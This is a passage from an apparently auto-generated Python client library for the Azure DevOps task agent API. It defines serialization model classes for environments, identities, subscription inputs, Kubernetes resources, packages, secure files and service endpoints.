:type queue_time: datetime
:param request_identifier: Request identifier of the Environment deployment execution history record
:type request_identifier: str
:param resource_id: Resource Id
:type resource_id: int
:param result: Result of the environment deployment execution
:type result: object
:param scope_id: Project Id
:type scope_id: str
:param service_owner: Service owner Id
:type service_owner: str
:param stage_attempt: Stage Attempt
:type stage_attempt: int
:param stage_name: Stage name
:type stage_name: str
:param start_time: Start time of the environment deployment execution
:type start_time: datetime
"""
_attribute_map = {
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'environment_id': {'key': 'environmentId', 'type': 'int'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'long'},
'job_attempt': {'key': 'jobAttempt', 'type': 'int'},
'job_name': {'key': 'jobName', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_id': {'key': 'planId', 'type': 'str'},
'plan_type': {'key': 'planType', 'type': 'str'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'request_identifier': {'key': 'requestIdentifier', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'int'},
'result': {'key': 'result', 'type': 'object'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'service_owner': {'key': 'serviceOwner', 'type': 'str'},
'stage_attempt': {'key': 'stageAttempt', 'type': 'int'},
'stage_name': {'key': 'stageName', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'}
}
def __init__(self, definition=None, environment_id=None, finish_time=None, id=None, job_attempt=None, job_name=None, owner=None, plan_id=None, plan_type=None, queue_time=None, request_identifier=None, resource_id=None, result=None, scope_id=None, service_owner=None, stage_attempt=None, stage_name=None, start_time=None):
super(EnvironmentDeploymentExecutionRecord, self).__init__()
self.definition = definition
self.environment_id = environment_id
self.finish_time = finish_time
self.id = id
self.job_attempt = job_attempt
self.job_name = job_name
self.owner = owner
self.plan_id = plan_id
self.plan_type = plan_type
self.queue_time = queue_time
self.request_identifier = request_identifier
self.resource_id = resource_id
self.result = result
self.scope_id = scope_id
self.service_owner = service_owner
self.stage_attempt = stage_attempt
self.stage_name = stage_name
self.start_time = start_time
class EnvironmentInstance(Model):
"""
Environment.
:param created_by: Identity reference of the user who created the Environment.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: Creation time of the Environment
:type created_on: datetime
:param description: Description of the Environment.
:type description: str
:param id: Id of the Environment
:type id: int
:param last_modified_by: Identity reference of the user who last modified the Environment.
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on: Last modified time of the Environment
:type last_modified_on: datetime
:param name: Name of the Environment.
:type name: str
:param resources:
:type resources: list of :class:`EnvironmentResourceReference <azure.devops.v5_1.task_agent.models.EnvironmentResourceReference>`
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'resources': {'key': 'resources', 'type': '[EnvironmentResourceReference]'}
}
def __init__(self, created_by=None, created_on=None, description=None, id=None, last_modified_by=None, last_modified_on=None, name=None, resources=None):
super(EnvironmentInstance, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.description = description
self.id = id
self.last_modified_by = last_modified_by
self.last_modified_on = last_modified_on
self.name = name
self.resources = resources
class EnvironmentReference(Model):
"""
:param id:
:type id: int
:param name:
:type name: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, id=None, name=None):
super(EnvironmentReference, self).__init__()
self.id = id
self.name = name
class EnvironmentResource(Model):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None):
super(EnvironmentResource, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.environment_reference = environment_reference
self.id = id
self.last_modified_by = last_modified_by
self.last_modified_on = last_modified_on
self.name = name
self.type = type
class EnvironmentResourceReference(Model):
"""
EnvironmentResourceReference.
:param id: Id of the resource.
:type id: int
:param name: Name of the resource.
:type name: str
:param type: Type of the resource.
:type type: object
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'}
}
def __init__(self, id=None, name=None, type=None):
super(EnvironmentResourceReference, self).__init__()
self.id = id
self.name = name
self.type = type
class EnvironmentUpdateParameter(Model):
"""
Properties to update Environment.
:param description: Description of the environment.
:type description: str
:param name: Name of the environment.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(EnvironmentUpdateParameter, self).__init__()
self.description = description
self.name = name
class GraphSubjectBase(Model):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None):
super(GraphSubjectBase, self).__init__()
self._links = _links
self.descriptor = descriptor
self.display_name = display_name
self.url = url
class HelpLink(Model):
"""
:param text:
:type text: str
:param url:
:type url: str
"""
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, text=None, url=None):
super(HelpLink, self).__init__()
self.text = text
self.url = url
class IdentityRef(GraphSubjectBase):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param directory_alias: Deprecated - Can be retrieved by querying the Graph user referenced in the "self" entry of the IdentityRef "_links" dictionary
:type directory_alias: str
:param id:
:type id: str
:param image_url: Deprecated - Available in the "avatar" entry of the IdentityRef "_links" dictionary
:type image_url: str
:param inactive: Deprecated - Can be retrieved by querying the Graph membership state referenced in the "membershipState" entry of the GraphUser "_links" dictionary
:type inactive: bool
:param is_aad_identity: Deprecated - Can be inferred from the subject type of the descriptor (Descriptor.IsAadUserType/Descriptor.IsAadGroupType)
:type is_aad_identity: bool
:param is_container: Deprecated - Can be inferred from the subject type of the descriptor (Descriptor.IsGroupType)
:type is_container: bool
:param is_deleted_in_origin:
:type is_deleted_in_origin: bool
:param profile_url: Deprecated - not in use in most preexisting implementations of ToIdentityRef
:type profile_url: str
:param unique_name: Deprecated - use Domain+PrincipalName instead
:type unique_name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'directory_alias': {'key': 'directoryAlias', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'image_url': {'key': 'imageUrl', 'type': 'str'},
'inactive': {'key': 'inactive', 'type': 'bool'},
'is_aad_identity': {'key': 'isAadIdentity', 'type': 'bool'},
'is_container': {'key': 'isContainer', 'type': 'bool'},
'is_deleted_in_origin': {'key': 'isDeletedInOrigin', 'type': 'bool'},
'profile_url': {'key': 'profileUrl', 'type': 'str'},
'unique_name': {'key': 'uniqueName', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, directory_alias=None, id=None, image_url=None, inactive=None, is_aad_identity=None, is_container=None, is_deleted_in_origin=None, profile_url=None, unique_name=None):
super(IdentityRef, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url)
self.directory_alias = directory_alias
self.id = id
self.image_url = image_url
self.inactive = inactive
self.is_aad_identity = is_aad_identity
self.is_container = is_container
self.is_deleted_in_origin = is_deleted_in_origin
self.profile_url = profile_url
self.unique_name = unique_name
class InputDescriptor(Model):
"""
Describes an input for subscriptions.
:param dependency_input_ids: The ids of all inputs that the value of this input is dependent on.
:type dependency_input_ids: list of str
:param description: Description of what this input is used for
:type description: str
:param group_name: The group localized name to which this input belongs and can be shown as a header for the container that will include all the inputs in the group.
:type group_name: str
:param has_dynamic_value_information: If true, the value information for this input is dynamic and should be fetched when the value of dependency inputs change.
:type has_dynamic_value_information: bool
:param id: Identifier for the subscription input
:type id: str
:param input_mode: Mode in which the value of this input should be entered
:type input_mode: object
:param is_confidential: Gets whether this input is confidential, such as for a password or application key
:type is_confidential: bool
:param name: Localized name which can be shown as a label for the subscription input
:type name: str
:param properties: Custom properties for the input which can be used by the service provider
:type properties: dict
:param type: Underlying data type for the input value. When this value is specified, InputMode, Validation and Values are optional.
:type type: str
:param use_in_default_description: Gets whether this input is included in the default generated action description.
:type use_in_default_description: bool
:param validation: Information to use to validate this input's value
:type validation: :class:`InputValidation <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValidation>`
:param value_hint: A hint for input value. It can be used in the UI as the input placeholder.
:type value_hint: str
:param values: Information about possible values for this input
:type values: :class:`InputValues <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValues>`
"""
_attribute_map = {
'dependency_input_ids': {'key': 'dependencyInputIds', 'type': '[str]'},
'description': {'key': 'description', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'has_dynamic_value_information': {'key': 'hasDynamicValueInformation', 'type': 'bool'},
'id': {'key': 'id', 'type': 'str'},
'input_mode': {'key': 'inputMode', 'type': 'object'},
'is_confidential': {'key': 'isConfidential', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{object}'},
'type': {'key': 'type', 'type': 'str'},
'use_in_default_description': {'key': 'useInDefaultDescription', 'type': 'bool'},
'validation': {'key': 'validation', 'type': 'InputValidation'},
'value_hint': {'key': 'valueHint', 'type': 'str'},
'values': {'key': 'values', 'type': 'InputValues'}
}
def __init__(self, dependency_input_ids=None, description=None, group_name=None, has_dynamic_value_information=None, id=None, input_mode=None, is_confidential=None, name=None, properties=None, type=None, use_in_default_description=None, validation=None, value_hint=None, values=None):
super(InputDescriptor, self).__init__()
self.dependency_input_ids = dependency_input_ids
self.description = description
self.group_name = group_name
self.has_dynamic_value_information = has_dynamic_value_information
self.id = id
self.input_mode = input_mode
self.is_confidential = is_confidential
self.name = name
self.properties = properties
self.type = type
self.use_in_default_description = use_in_default_description
self.validation = validation
self.value_hint = value_hint
self.values = values
class InputValidation(Model):
"""
Describes what values are valid for a subscription input
:param data_type: Gets or sets the data data type to validate.
:type data_type: object
:param is_required: Gets or sets if this is a required field.
:type is_required: bool
:param max_length: Gets or sets the maximum length of this descriptor.
:type max_length: int
:param max_value: Gets or sets the minimum value for this descriptor.
:type max_value: decimal
:param min_length: Gets or sets the minimum length of this descriptor.
:type min_length: int
:param min_value: Gets or sets the minimum value for this descriptor.
:type min_value: decimal
:param pattern: Gets or sets the pattern to validate.
:type pattern: str
:param pattern_mismatch_error_message: Gets or sets the error on pattern mismatch.
:type pattern_mismatch_error_message: str
"""
_attribute_map = {
'data_type': {'key': 'dataType', 'type': 'object'},
'is_required': {'key': 'isRequired', 'type': 'bool'},
'max_length': {'key': 'maxLength', 'type': 'int'},
'max_value': {'key': 'maxValue', 'type': 'decimal'},
'min_length': {'key': 'minLength', 'type': 'int'},
'min_value': {'key': 'minValue', 'type': 'decimal'},
'pattern': {'key': 'pattern', 'type': 'str'},
'pattern_mismatch_error_message': {'key': 'patternMismatchErrorMessage', 'type': 'str'}
}
def __init__(self, data_type=None, is_required=None, max_length=None, max_value=None, min_length=None, min_value=None, pattern=None, pattern_mismatch_error_message=None):
super(InputValidation, self).__init__()
self.data_type = data_type
self.is_required = is_required
self.max_length = max_length
self.max_value = max_value
self.min_length = min_length
self.min_value = min_value
self.pattern = pattern
self.pattern_mismatch_error_message = pattern_mismatch_error_message
class InputValidationRequest(Model):
"""
:param inputs:
:type inputs: dict
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{ValidationItem}'}
}
def __init__(self, inputs=None):
super(InputValidationRequest, self).__init__()
self.inputs = inputs
class InputValue(Model):
"""
Information about a single value for an input
:param data: Any other data about this input
:type data: dict
:param display_value: The text to show for the display of this value
:type display_value: str
:param value: The value to store for this input
:type value: str
"""
_attribute_map = {
'data': {'key': 'data', 'type': '{object}'},
'display_value': {'key': 'displayValue', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, data=None, display_value=None, value=None):
super(InputValue, self).__init__()
self.data = data
self.display_value = display_value
self.value = value
class InputValues(Model):
"""
Information about the possible/allowed values for a given subscription input
:param default_value: The default value to use for this input
:type default_value: str
:param error: Errors encountered while computing dynamic values.
:type error: :class:`InputValuesError <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValuesError>`
:param input_id: The id of the input
:type input_id: str
:param is_disabled: Should this input be disabled
:type is_disabled: bool
:param is_limited_to_possible_values: Should the value be restricted to one of the values in the PossibleValues (True) or are the values in PossibleValues just a suggestion (False)
:type is_limited_to_possible_values: bool
:param is_read_only: Should this input be made read-only
:type is_read_only: bool
:param possible_values: Possible values that this input can take
:type possible_values: list of :class:`InputValue <azure.devops.v5_1.microsoft._visual_studio._services._web_api.models.InputValue>`
"""
_attribute_map = {
'default_value': {'key': 'defaultValue', 'type': 'str'},
'error': {'key': 'error', 'type': 'InputValuesError'},
'input_id': {'key': 'inputId', 'type': 'str'},
'is_disabled': {'key': 'isDisabled', 'type': 'bool'},
'is_limited_to_possible_values': {'key': 'isLimitedToPossibleValues', 'type': 'bool'},
'is_read_only': {'key': 'isReadOnly', 'type': 'bool'},
'possible_values': {'key': 'possibleValues', 'type': '[InputValue]'}
}
def __init__(self, default_value=None, error=None, input_id=None, is_disabled=None, is_limited_to_possible_values=None, is_read_only=None, possible_values=None):
super(InputValues, self).__init__()
self.default_value = default_value
self.error = error
self.input_id = input_id
self.is_disabled = is_disabled
self.is_limited_to_possible_values = is_limited_to_possible_values
self.is_read_only = is_read_only
self.possible_values = possible_values
class InputValuesError(Model):
"""
Error information related to a subscription input value.
:param message: The error message.
:type message: str
"""
_attribute_map = {
'message': {'key': 'message', 'type': 'str'}
}
def __init__(self, message=None):
super(InputValuesError, self).__init__()
self.message = message
class KubernetesResource(EnvironmentResource):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
:param cluster_name:
:type cluster_name: str
:param namespace:
:type namespace: str
:param service_endpoint_id:
:type service_endpoint_id: str
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'},
'cluster_name': {'key': 'clusterName', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'service_endpoint_id': {'key': 'serviceEndpointId', 'type': 'str'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None, cluster_name=None, namespace=None, service_endpoint_id=None):
super(KubernetesResource, self).__init__(created_by=created_by, created_on=created_on, environment_reference=environment_reference, id=id, last_modified_by=last_modified_by, last_modified_on=last_modified_on, name=name, type=type)
self.cluster_name = cluster_name
self.namespace = namespace
self.service_endpoint_id = service_endpoint_id
class KubernetesResourceCreateParameters(Model):
"""
:param cluster_name:
:type cluster_name: str
:param name:
:type name: str
:param namespace:
:type namespace: str
:param service_endpoint_id:
:type service_endpoint_id: str
"""
_attribute_map = {
'cluster_name': {'key': 'clusterName', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'service_endpoint_id': {'key': 'serviceEndpointId', 'type': 'str'}
}
def __init__(self, cluster_name=None, name=None, namespace=None, service_endpoint_id=None):
super(KubernetesResourceCreateParameters, self).__init__()
self.cluster_name = cluster_name
self.name = name
self.namespace = namespace
self.service_endpoint_id = service_endpoint_id
class MarketplacePurchasedLicense(Model):
"""
Represents a purchase of resource units in a secondary marketplace.
:param marketplace_name: The Marketplace display name.
:type marketplace_name: str
:param purchaser_name: The name of the identity making the purchase as seen by the marketplace
:type purchaser_name: str
:param purchase_unit_count: The quantity purchased.
:type purchase_unit_count: int
"""
_attribute_map = {
'marketplace_name': {'key': 'marketplaceName', 'type': 'str'},
'purchaser_name': {'key': 'purchaserName', 'type': 'str'},
'purchase_unit_count': {'key': 'purchaseUnitCount', 'type': 'int'}
}
def __init__(self, marketplace_name=None, purchaser_name=None, purchase_unit_count=None):
super(MarketplacePurchasedLicense, self).__init__()
self.marketplace_name = marketplace_name
self.purchaser_name = purchaser_name
self.purchase_unit_count = purchase_unit_count
class MetricsColumnMetaData(Model):
"""
Meta data for a metrics column.
:param column_name: Name.
:type column_name: str
:param column_value_type: Data type.
:type column_value_type: str
"""
_attribute_map = {
'column_name': {'key': 'columnName', 'type': 'str'},
'column_value_type': {'key': 'columnValueType', 'type': 'str'}
}
def __init__(self, column_name=None, column_value_type=None):
super(MetricsColumnMetaData, self).__init__()
self.column_name = column_name
self.column_value_type = column_value_type
class MetricsColumnsHeader(Model):
"""
Metrics columns header
:param dimensions: Properties of deployment group for which metrics are provided. E.g. 1: LastJobStatus E.g. 2: TargetState
:type dimensions: list of :class:`MetricsColumnMetaData <azure.devops.v5_1.task_agent.models.MetricsColumnMetaData>`
:param metrics: The types of metrics. E.g. 1: total count of deployment targets. E.g. 2: Average time of deployment to the deployment targets.
:type metrics: list of :class:`MetricsColumnMetaData <azure.devops.v5_1.task_agent.models.MetricsColumnMetaData>`
"""
_attribute_map = {
'dimensions': {'key': 'dimensions', 'type': '[MetricsColumnMetaData]'},
'metrics': {'key': 'metrics', 'type': '[MetricsColumnMetaData]'}
}
def __init__(self, dimensions=None, metrics=None):
super(MetricsColumnsHeader, self).__init__()
self.dimensions = dimensions
self.metrics = metrics
class MetricsRow(Model):
"""
Metrics row.
:param dimensions: The values of the properties mentioned as 'Dimensions' in column header. E.g. 1: For a property 'LastJobStatus' - metrics will be provided for 'passed', 'failed', etc. E.g. 2: For a property 'TargetState' - metrics will be provided for 'online', 'offline' targets.
:type dimensions: list of str
:param metrics: Metrics in serialized format. Should be deserialized based on the data type provided in header.
:type metrics: list of str
"""
_attribute_map = {
'dimensions': {'key': 'dimensions', 'type': '[str]'},
'metrics': {'key': 'metrics', 'type': '[str]'}
}
def __init__(self, dimensions=None, metrics=None):
super(MetricsRow, self).__init__()
self.dimensions = dimensions
self.metrics = metrics
class PackageMetadata(Model):
"""
Represents a downloadable package.
:param created_on: The date the package was created
:type created_on: datetime
:param download_url: A direct link to download the package.
:type download_url: str
:param filename: The UI uses this to display instructions, i.e. "unzip MyAgent.zip"
:type filename: str
:param hash_value: MD5 hash as a base64 string
:type hash_value: str
:param info_url: A link to documentation
:type info_url: str
:param platform: The platform (win7, linux, etc.)
:type platform: str
:param type: The type of package (e.g. "agent")
:type type: str
:param version: The package version.
:type version: :class:`PackageVersion <azure.devops.v5_1.task_agent.models.PackageVersion>`
"""
_attribute_map = {
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'filename': {'key': 'filename', 'type': 'str'},
'hash_value': {'key': 'hashValue', 'type': 'str'},
'info_url': {'key': 'infoUrl', 'type': 'str'},
'platform': {'key': 'platform', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'version': {'key': 'version', 'type': 'PackageVersion'}
}
def __init__(self, created_on=None, download_url=None, filename=None, hash_value=None, info_url=None, platform=None, type=None, version=None):
super(PackageMetadata, self).__init__()
self.created_on = created_on
self.download_url = download_url
self.filename = filename
self.hash_value = hash_value
self.info_url = info_url
self.platform = platform
self.type = type
self.version = version
class PackageVersion(Model):
"""
:param major:
:type major: int
:param minor:
:type minor: int
:param patch:
:type patch: int
"""
_attribute_map = {
'major': {'key': 'major', 'type': 'int'},
'minor': {'key': 'minor', 'type': 'int'},
'patch': {'key': 'patch', 'type': 'int'}
}
def __init__(self, major=None, minor=None, patch=None):
super(PackageVersion, self).__init__()
self.major = major
self.minor = minor
self.patch = patch
class ProjectReference(Model):
"""
:param id:
:type id: str
:param name:
:type name: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, id=None, name=None):
super(ProjectReference, self).__init__()
self.id = id
self.name = name
class PublishTaskGroupMetadata(Model):
"""
:param comment:
:type comment: str
:param parent_definition_revision:
:type parent_definition_revision: int
:param preview:
:type preview: bool
:param task_group_id:
:type task_group_id: str
:param task_group_revision:
:type task_group_revision: int
"""
_attribute_map = {
'comment': {'key': 'comment', 'type': 'str'},
'parent_definition_revision': {'key': 'parentDefinitionRevision', 'type': 'int'},
'preview': {'key': 'preview', 'type': 'bool'},
'task_group_id': {'key': 'taskGroupId', 'type': 'str'},
'task_group_revision': {'key': 'taskGroupRevision', 'type': 'int'}
}
def __init__(self, comment=None, parent_definition_revision=None, preview=None, task_group_id=None, task_group_revision=None):
super(PublishTaskGroupMetadata, self).__init__()
self.comment = comment
self.parent_definition_revision = parent_definition_revision
self.preview = preview
self.task_group_id = task_group_id
self.task_group_revision = task_group_revision
class ReferenceLinks(Model):
"""
The class to represent a collection of REST reference links.
:param links: The readonly view of the links. Because Reference links are readonly, we only want to expose them as read only.
:type links: dict
"""
_attribute_map = {
'links': {'key': 'links', 'type': '{object}'}
}
def __init__(self, links=None):
super(ReferenceLinks, self).__init__()
self.links = links
class ResourceLimit(Model):
"""
:param failed_to_reach_all_providers:
:type failed_to_reach_all_providers: bool
:param host_id:
:type host_id: str
:param is_hosted:
:type is_hosted: bool
:param is_premium:
:type is_premium: bool
:param parallelism_tag:
:type parallelism_tag: str
:param resource_limits_data:
:type resource_limits_data: dict
:param total_count:
:type total_count: int
:param total_minutes:
:type total_minutes: int
"""
_attribute_map = {
'failed_to_reach_all_providers': {'key': 'failedToReachAllProviders', 'type': 'bool'},
'host_id': {'key': 'hostId', 'type': 'str'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_premium': {'key': 'isPremium', 'type': 'bool'},
'parallelism_tag': {'key': 'parallelismTag', 'type': 'str'},
'resource_limits_data': {'key': 'resourceLimitsData', 'type': '{str}'},
'total_count': {'key': 'totalCount', 'type': 'int'},
'total_minutes': {'key': 'totalMinutes', 'type': 'int'}
}
def __init__(self, failed_to_reach_all_providers=None, host_id=None, is_hosted=None, is_premium=None, parallelism_tag=None, resource_limits_data=None, total_count=None, total_minutes=None):
super(ResourceLimit, self).__init__()
self.failed_to_reach_all_providers = failed_to_reach_all_providers
self.host_id = host_id
self.is_hosted = is_hosted
self.is_premium = is_premium
self.parallelism_tag = parallelism_tag
self.resource_limits_data = resource_limits_data
self.total_count = total_count
self.total_minutes = total_minutes
class ResourceUsage(Model):
"""
:param resource_limit:
:type resource_limit: :class:`ResourceLimit <azure.devops.v5_1.task_agent.models.ResourceLimit>`
:param running_requests:
:type running_requests: list of :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param used_count:
:type used_count: int
:param used_minutes:
:type used_minutes: int
"""
_attribute_map = {
'resource_limit': {'key': 'resourceLimit', 'type': 'ResourceLimit'},
'running_requests': {'key': 'runningRequests', 'type': '[TaskAgentJobRequest]'},
'used_count': {'key': 'usedCount', 'type': 'int'},
'used_minutes': {'key': 'usedMinutes', 'type': 'int'}
}
def __init__(self, resource_limit=None, running_requests=None, used_count=None, used_minutes=None):
super(ResourceUsage, self).__init__()
self.resource_limit = resource_limit
self.running_requests = running_requests
self.used_count = used_count
self.used_minutes = used_minutes
class ResultTransformationDetails(Model):
"""
:param result_template:
:type result_template: str
"""
_attribute_map = {
'result_template': {'key': 'resultTemplate', 'type': 'str'}
}
def __init__(self, result_template=None):
super(ResultTransformationDetails, self).__init__()
self.result_template = result_template
class SecureFile(Model):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param id:
:type id: str
:param modified_by:
:type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param modified_on:
:type modified_on: datetime
:param name:
:type name: str
:param properties:
:type properties: dict
:param ticket:
:type ticket: str
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'str'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'ticket': {'key': 'ticket', 'type': 'str'}
}
def __init__(self, created_by=None, created_on=None, id=None, modified_by=None, modified_on=None, name=None, properties=None, ticket=None):
super(SecureFile, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.id = id
self.modified_by = modified_by
self.modified_on = modified_on
self.name = name
self.properties = properties
self.ticket = ticket
class ServiceEndpoint(Model):
"""
Represents an endpoint which may be used by an orchestration job.
:param administrators_group: Gets or sets the identity reference for the administrators group of the service endpoint.
:type administrators_group: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param authorization: Gets or sets the authorization data for talking to the endpoint.
:type authorization: :class:`EndpointAuthorization <azure.devops.v5_1.task_agent.models.EndpointAuthorization>`
:param created_by: Gets or sets the identity reference for the user who created the Service endpoint.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param data:
:type data: dict
:param description: Gets or sets the description of endpoint.
:type description: str
:param group_scope_id:
:type group_scope_id: str
:param id: Gets or sets the identifier of this endpoint.
:type id: str
:param is_ready: EndPoint state indicator
:type is_ready: bool
:param is_shared: Indicates whether service endpoint is shared with other projects or not.
:type is_shared: bool
:param name: Gets or sets the friendly name of the endpoint.
:type name: str
:param operation_status: Error message during creation/deletion of endpoint
:type operation_status: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param owner: Gets or sets the owner of the endpoint.
:type owner: str
:param readers_group: Gets or sets the identity reference for the readers group of the service endpoint.
:type readers_group: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param type: Gets or sets the type of the endpoint.
:type type: str
:param url: Gets or sets the url of the endpoint.
:type url: str
"""
_attribute_map = {
'administrators_group': {'key': 'administratorsGroup', 'type': 'IdentityRef'},
'authorization': {'key': 'authorization', 'type': 'EndpointAuthorization'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'data': {'key': 'data', 'type': '{str}'},
'description': {'key': 'description', 'type': 'str'},
'group_scope_id': {'key': 'groupScopeId', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'is_ready': {'key': 'isReady', 'type': 'bool'},
'is_shared': {'key': 'isShared', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'operation_status': {'key': 'operationStatus', 'type': 'object'},
'owner': {'key': 'owner', 'type': 'str'},
